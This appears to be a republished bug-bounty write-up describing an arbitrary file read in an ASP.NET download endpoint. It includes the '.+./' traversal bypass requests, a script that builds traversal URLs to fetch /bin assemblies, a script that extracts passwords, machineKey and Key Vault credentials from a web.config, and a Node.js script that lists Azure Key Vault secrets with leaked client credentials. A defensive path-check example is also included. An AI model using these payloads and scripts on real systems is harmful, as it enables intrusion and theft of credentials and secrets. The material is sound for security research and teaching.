2025-04-04 Update From: SLTechnology News&Howtos shulou
Shulou (Shulou.com) 05/31 Report
This article walks through an arbitrary file read in an ASP.NET application: a download endpoint whose path traversal filter could be bypassed, which led in turn to application source code, the web.config, and the credentials of the application's Azure Key Vault.
Identifying the vulnerable endpoint
While testing a target recently I came across this URL:
https://domain.com/utility/download.aspx?f=DJ/lc1jVgHTZF...
My first thought was to try to download arbitrary files. When the page loads it fetches a help document from another path on the server, but the f parameter is encrypted (the value looks like AES output), so it cannot be tampered with directly. If the key could be recovered, the same local file disclosure described below could presumably be reached through this endpoint as well.
Fortunately, the old version of the site exposed the same download endpoint with the parameter in the clear:
https://domain.com/utility/download.aspx?f=file1234.docx
The response was as follows:
HTTP/1.1 200 OK
Connection: close
Content-Length: 27363

Ïó|uœZ^tÙ¢yǯ;! Y,}{ûCƒ³/h>   (binary .docx content)
I immediately changed the parameter to download.aspx, and the content of the .aspx file itself came back:
GET /utility/download.aspx?f=download.aspx

HTTP/1.1 200 OK
Connection: close
Content-Length: 263
Further testing showed that .aspx files could be read but the .aspx.cs code-behind files could not.
The difference between .aspx and .aspx.cs is explained at https://stackoverflow.com/questions/13182757/what-is-the-difference-between-aspx-and-aspx-cs
This makes sense: with the code-behind model the .aspx.cs source is compiled into an assembly under /bin at build time and is not deployed, so the file is simply not on disk. Without the application logic, though, the read could not be taken much further, so this needed solving.
I moved on to other directories to see what else could be found.
Bypassing the directory traversal filter
Using an ordinary ../ sequence for traversal always returned 400 Bad Request, which suggested some filtering on the parameter.
Rather than test candidates by hand, I used Burp to fuzz the character between the two dots with the following request:
GET /utility/download.aspx?f=.[fuzz]./utility/download.aspx
Looking through the responses, the correct file content came back when the inserted character was +.
This puzzled me: the same + payload failed against a locally built test environment. My rough guess is that the + in the URL decodes to a space and that the behaviour has to do with how Windows handles file names. Whatever the exact mechanism, the lesson is the same: rejecting the literal string ../ in the raw parameter is not a path check. The check has to run on the decoded, fully resolved path, using the same normalisation rules the file open will use.
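As an added example (not code from the original post), the following script contrasts the kind of substring blacklist the target appeared to use with a canonicalising check. The web root and file names are constructed for the demo. It goes beyond the single bypass in the post and runs several classic payloads through both checks: an encoded slash, a backslash, an absolute path (which shows why the containment test, not the path join, is the security boundary), and the post's own .+./ trick.

```python
"""Added example (not from the original post): why a '../' blacklist on a
download parameter fails, and what a canonicalising check looks like instead.
Paths and file names below are constructed for the demo."""
import os
import urllib.parse

# Constructed web root; the target's real layout is not known from the post.
DOWNLOAD_BASE = os.path.realpath("/var/www/app/utility/docs")


def blacklist_allows(raw_param: str) -> bool:
    """Models the kind of filter the target appeared to have: reject the
    literal substring '../' in the raw query value, otherwise serve the file."""
    return "../" not in raw_param


def canonical_allows(raw_param: str, base: str = DOWNLOAD_BASE) -> bool:
    """Hardened check: decode the parameter the way the framework will,
    normalise separators, resolve against the base directory and require
    the resolved path to stay inside it.

    Note that os.path.join discards 'base' when 'name' is absolute, which is
    exactly why the containment test on the resolved path, not the join, is
    the security boundary."""
    name = urllib.parse.unquote_plus(raw_param)   # '+' -> ' ', %2F -> '/'
    name = name.replace("\\", "/")                # backslashes are separators on Windows hosts
    full = os.path.realpath(os.path.join(base, name))
    return os.path.commonpath([base, full]) == base


PAYLOADS = [
    "file1234.docx",            # legitimate request
    "../web.config",            # plain traversal
    "..%2Fweb.config",          # encoded slash
    "..\\web.config",           # backslash
    "/etc/passwd",              # absolute path
    ".+./.+./web.config",       # the post's bypass: '+' decodes to a space
]


def compare(payloads=PAYLOADS):
    """Return {payload: (blacklist_verdict, canonical_verdict)}; True = served."""
    return {p: (blacklist_allows(p), canonical_allows(p)) for p in payloads}


if __name__ == "__main__":
    for p, (bl, canon) in compare().items():
        print(f"{p:22} blacklist={'allow' if bl else 'block':5} canonical={'allow' if canon else 'block'}")
```

On a POSIX host the last payload resolves to literal directories named ". ." inside the base directory, so the canonical check reports it as contained; on the Windows target it escaped. That is the point of doing the check with the platform's own full-path normalisation (in .NET, Path.GetFullPath) rather than with a string filter.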
Further exploitation
With the filter bypassed, I tried reading an .ashx file. Generic handlers are not HTML pages: their code can live inline in the file itself rather than in a compiled code-behind, so the source should be readable. The Imports lines in the response show this one was written in VB.NET.
It read successfully:
HTTP/1.1 200 OK
Connection: close
Content-Length: 2398

Imports System
Imports System.Data
Imports System.Data.SqlClient
Imports System.IO
Imports System.Web
Imports System.Configuration
...
I had already gotten some sensitive information here, and wanted to take it further, so I decided to read more source code files.
When unsure about a technology, read its documentation. The ASP.NET documentation shows that code-behind classes are compiled into assemblies under /bin (typically /bin/<project or root namespace>.dll). The Inherits and Class attributes in the .aspx and .ashx directives name those classes, so the class names found in the files already read tell us which assemblies to fetch.
I was able to download the DLL (see https://blogs.msdn.microsoft.com/tom/2008/07/21/asp-net-tips-loading-a-dll-out-of-the-bin-directory/ on how ASP.NET loads assemblies from /bin) by sending the following request:
GET /utility/download.aspx?f=.+./.+./bin/redacted.dll
After downloading, load the DLL into dnSpy (a .NET decompiler) to recover the application source code. From there the remaining assemblies referenced by the pages can be fetched the same way until the whole code base is recovered.
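As an added example (not code from the original post), this script does the mapping described above: it parses the directive at the top of a downloaded .aspx or .ashx, derives candidate assembly paths under /bin, and builds the .+./ traversal request used in the post to fetch them. The three sample sources and the Contoso.Portal names are constructed; the endpoint path and traversal depth default to the ones the post used.

```python
"""Added example (not from the original post): map the class names in ASP.NET
page/handler directives to candidate assemblies under /bin, then build the
traversal request used in the post to fetch them. Sample sources are constructed."""
import re

DIRECTIVE_RE = re.compile(
    r"<%@\s*(?P<kind>Page|Control|Master|WebHandler|WebService)\b(?P<attrs>.*?)%>",
    re.IGNORECASE | re.DOTALL,
)
ATTR_RE = re.compile(r'(?P<name>\w+)\s*=\s*"(?P<value>[^"]*)"')


def parse_directive(source: str):
    """Return (kind, {attribute: value}) for the first directive in an
    .aspx/.ascx/.master/.ashx/.asmx file, or None if there is none."""
    m = DIRECTIVE_RE.search(source)
    if m is None:
        return None
    attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group("attrs"))}
    return m.group("kind").lower(), attrs


def assembly_candidates(source: str) -> list:
    """Candidate paths (relative to the web root) for the assembly holding the
    page's compiled code, most specific first:
      1. an explicit Assembly= attribute, or the ', AssemblyName' suffix that
         precompiled sites use in Inherits="Ns.Type, App_Web_xxxx";
      2. every namespace prefix of the type name, because a Web Application
         Project normally compiles to bin/<RootNamespace>.dll.
    An empty list means the type has no namespace and no assembly hint, which
    usually indicates inline code (as with the VB handler read in the post)."""
    parsed = parse_directive(source)
    if parsed is None:
        return []
    _kind, attrs = parsed
    # Pages/controls name their class with Inherits=, handlers/services with Class=.
    type_ref = attrs.get("inherits") or attrs.get("class") or ""
    type_name, _, explicit = type_ref.partition(",")
    explicit = explicit.strip() or attrs.get("assembly", "").strip()

    candidates = []
    if explicit:
        candidates.append(f"bin/{explicit}.dll")
    parts = type_name.strip().split(".")
    for depth in range(len(parts) - 1, 0, -1):      # drop the type name, then shorten
        path = f"bin/{'.'.join(parts[:depth])}.dll"
        if path not in candidates:
            candidates.append(path)
    return candidates


def traversal_url(rel_path: str, depth: int = 2, endpoint: str = "/utility/download.aspx") -> str:
    """Build the request the post used: one '.+./' per directory level, where
    the '+' decodes to a space and slipped past the '../' filter on the target."""
    return f"{endpoint}?f={'.+./' * depth}{rel_path}"


# Constructed samples; the Contoso.Portal names are hypothetical.
PAGE_SRC = ('<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="download.aspx.cs" '
            'Inherits="Contoso.Portal.Utility.Download" %>\n<html><body>...</body></html>')
PRECOMPILED_SRC = '<%@ page language="C#" inherits="Contoso.Portal.Utility.Download, App_Web_utility" %>'
HANDLER_SRC = '<%@ WebHandler Language="VB" Class="ExportHandler" %>\nImports System\nImports System.Data.SqlClient\n'

if __name__ == "__main__":
    for label, src in [("page", PAGE_SRC), ("precompiled", PRECOMPILED_SRC), ("handler", HANDLER_SRC)]:
        print(label, parse_directive(src)[0], assembly_candidates(src))
    for path in assembly_candidates(PAGE_SRC):
        print(traversal_url(path))
```

Try the candidates in order and stop at the first 200 with an MZ header; once one assembly is decompiled, its references (and any web.config <compilation><assemblies> entries) give the rest.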
Azure Key Vault access shows the real impact
The most sensitive file in an ASP.NET application is web.config. It is the configuration file for everything from a single directory up to the whole site, and it routinely holds SQL connection strings with passwords (connectionStrings), application secrets and the keys used for encrypted parameters like the one seen above (appSettings, machineKey), and the internal service endpoints the application talks to.
A typical web.config therefore has connectionStrings, appSettings and machineKey sections, and that is exactly where this kind of material sits.
Sending the following request returned the contents of web.config:
GET /utility/download.aspx?f=.+./.+./web.config
The response contained many secrets; the most notable were the following (redacted here):
......
These values are client credentials for an Azure Key Vault instance. Key Vault is where the application keeps its own most sensitive secrets, so this is the material that matters most.
The remaining question was how to talk to the Key Vault correctly. After discussing it with my friend shubs, he quickly wrote a Node.js script that used the leaked client credentials to authenticate and list the vault's secrets... haha
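As an added example (not code from the original post), the following script does the triage step between reading web.config and using its contents: it pulls out connection strings and their passwords, appSettings whose names look secret-bearing, the machineKey, and, if present, a Key Vault client-credential triple ready to feed to the SDK. The embedded web.config is constructed and none of its values are real.

```python
"""Added example (not from the original post): pull the usual secret-bearing
items out of a leaked web.config (connection strings, suspicious appSettings,
machineKey) and pick out a Key Vault client-credential triple if present.
The sample config below is constructed; none of its values are real."""
import re
import xml.etree.ElementTree as ET

SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="PortalDb" providerName="System.Data.SqlClient"
         connectionString="Server=sql01;Database=portal;User Id=portal_app;Password=S3cr3t!Pass;" />
  </connectionStrings>
  <appSettings>
    <add key="SiteName" value="Portal" />
    <add key="KeyVault:ClientId" value="11111111-2222-3333-4444-555555555555" />
    <add key="KeyVault:ClientSecret" value="example-client-secret" />
    <add key="KeyVault:VaultUri" value="https://example.vault.azure.net/" />
    <add key="ParamEncryptionKey" value="c2FtcGxlLWtleS1ub3QtcmVhbA==" />
  </appSettings>
  <system.web>
    <machineKey validationKey="0123456789ABCDEF" decryptionKey="FEDCBA9876543210"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>
"""

# Setting names worth reporting; deliberately broad, this is triage not proof.
SUSPICIOUS_KEY = re.compile(r"secret|password|pwd|key|token|client.?id|vault|connection", re.I)


def parse_connection_string(value: str) -> dict:
    """Split 'k=v;k=v' into a lower-cased dict (SQL Server connection string form)."""
    out = {}
    for part in value.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            out[k.strip().lower()] = v.strip()
    return out


def extract_secrets(xml_text: str) -> dict:
    """Return connection string credentials, suspicious appSettings, the
    machineKey attributes and, when all three parts exist, Key Vault credentials."""
    root = ET.fromstring(xml_text)
    result = {"connection_strings": {}, "app_settings": {}, "machine_key": None, "key_vault": None}

    cs = root.find("connectionStrings")
    for add in (cs.findall("add") if cs is not None else []):
        parsed = parse_connection_string(add.get("connectionString", ""))
        result["connection_strings"][add.get("name")] = {
            "server": parsed.get("server") or parsed.get("data source"),
            "user": parsed.get("user id") or parsed.get("uid"),
            "password": parsed.get("password") or parsed.get("pwd"),
        }

    settings = root.find("appSettings")
    for add in (settings.findall("add") if settings is not None else []):
        key, value = add.get("key", ""), add.get("value", "")
        if SUSPICIOUS_KEY.search(key):
            result["app_settings"][key] = value

    mk = next(root.iter("machineKey"), None)   # forms-auth / ViewState keys
    if mk is not None:
        result["machine_key"] = dict(mk.attrib)

    def pick(pattern):
        for k, v in result["app_settings"].items():
            if re.search(pattern, k, re.I):
                return v
        return None

    # The vault URI is also recognisable by value, whatever the setting is called.
    vault_uri = pick(r"vault.?uri") or next(
        (v for v in result["app_settings"].values() if re.search(r"\.vault\.azure\.net", v)), None)
    client_id, client_secret = pick(r"client.?id"), pick(r"client.?secret")
    if vault_uri and client_id and client_secret:
        result["key_vault"] = {"client_id": client_id, "client_secret": client_secret, "vault_uri": vault_uri}
    return result


if __name__ == "__main__":
    import json
    print(json.dumps(extract_secrets(SAMPLE_WEB_CONFIG), indent=2))
```

The key_vault entry is the triple the Node.js script below expects (clientId, clientSecret, vaultUri); the machineKey is worth reporting on its own, since it is what signs and encrypts ViewState and forms-authentication cookies.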
var KeyVault = require('azure-keyvault');
var AuthenticationContext = require('adal-node').AuthenticationContext;

var clientId = "clientId";          // values taken from the leaked web.config
var clientSecret = "clientSecret";
var vaultUri = "vaultUri";

// Authenticator - retrieves the access token
var authenticator = function (challenge, callback) {
    // Create a new authentication context.
    var context = new AuthenticationContext(challenge.authorization);
    // Use the context to acquire an authentication token.
    return context.acquireTokenWithClientCredentials(challenge.resource, clientId, clientSecret, function (err, tokenResponse) {
        if (err) throw err;
        // Calculate the value to be set in the request's Authorization header and resume the call.
        var authorizationValue = tokenResponse.tokenType + ' ' + tokenResponse.accessToken;
        console.log(authorizationValue);
        return callback(null, authorizationValue);
    });
};

var credentials = new KeyVault.KeyVaultCredentials(authenticator);
var client = new KeyVault.KeyVaultClient(credentials);

client.getSecrets(vaultUri).then(function (value) {
    console.log(value);
});
The azure-keyvault and adal-node packages used here have since been deprecated in favour of @azure/keyvault-secrets and @azure/identity, but the flow is unchanged: acquire a token with the client credentials, then list the vault's secrets. The response was as follows:
{ id: 'https://redacted.vault.azure.net/secrets/ftp_credentials',
  attributes:
   { enabled: true,
     created: 2018-01-23T22:14:18.000Z,
     updated: 2018-01-23T22:14:18.000Z,
     recoveryLevel: 'Purgeable' },
  contentType: 'secret' } ]
... more secrets ...
That completed the exploitation. The secrets obtained were more than enough to demonstrate the severity, so I stopped there and submitted the report.